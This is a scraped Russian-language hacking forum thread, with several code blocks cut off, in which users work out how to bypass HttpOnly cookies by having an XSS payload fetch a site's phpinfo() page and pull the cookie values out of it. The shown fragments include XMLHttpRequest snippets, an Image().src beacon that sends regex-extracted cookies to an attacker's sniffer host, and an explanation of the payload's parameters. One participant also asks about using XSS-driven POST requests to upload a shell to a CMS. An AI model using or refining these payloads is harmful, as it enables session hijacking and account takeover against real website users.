![]() |
Появилась идея обойти httponly кукис через страничку phpinfo. Чтобы пользователь зайдя на страничку с xss в фоновом режиме открывал phpinfo() а html код странички отправлялся нам . Может уже кто то реализовал такое ?
|
Цитата:
Код:
var xhttp = new XMLHttpRequest(); |
надеюсь @psihoz26 меня не покорает за его скрипт)
Код:
var xhr = new XMLHttpRequest(); |
Спасибо друзья +
|
Цитата:
PHP код:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Код:
|
Цитата:
Цитата:
|
Цитата:
Цитата:
В XSS вставляю скрипт в таком виде img= new Image();img.src="http://bldfdfdd.125mb.com/22.js" . Может проблемма в src ? В таком виде браузер подгружает скрипт с хостинга, но он не исполняется . |
Цитата:
Цитата:
|
Цитата:
Цитата:
Код:
var x = new XMLHttpRequest(); |
Цитата:
|
Пояснения по этому коду
Цитата:
$PARAM2 - сайт с твоим снифером, на который ты "как бы" обращаешься за картинкой и в параметрах запроса указываешь выдранные куки из ответа: xhr.responseText - ответ с данными от phpInfo, /_COOKIE.*?(.*?)/m - регулярка, которая выдёргивает куки из ответа. В итоге именно этот скрипт с изменёнными под тебя $PARAM12 должен выполняться на стороне браузера. |
|
Цитата:
|
Цитата:
|
Мужики подскажите, застопорился с этим скриптом . Он изымает куки с phphinfo , но только одну строчку . Гдето в регулярке проблема .
Код:
new Image()).src="//%сниффер%/?"+xhr.responseText.match(/_COOKIE.*?(.*?)/m)[1] |
Из вышесказанного, получается даже можно шелл залить?(опред. cms), зная какой post запрос слать(загрузка файла в админке в дефолт директорию)
|
Цитата:
/threads/275417/ - "Чтение данных и выполнение запросов через XSS" |
Цитата:
|
| Время: 13:38 |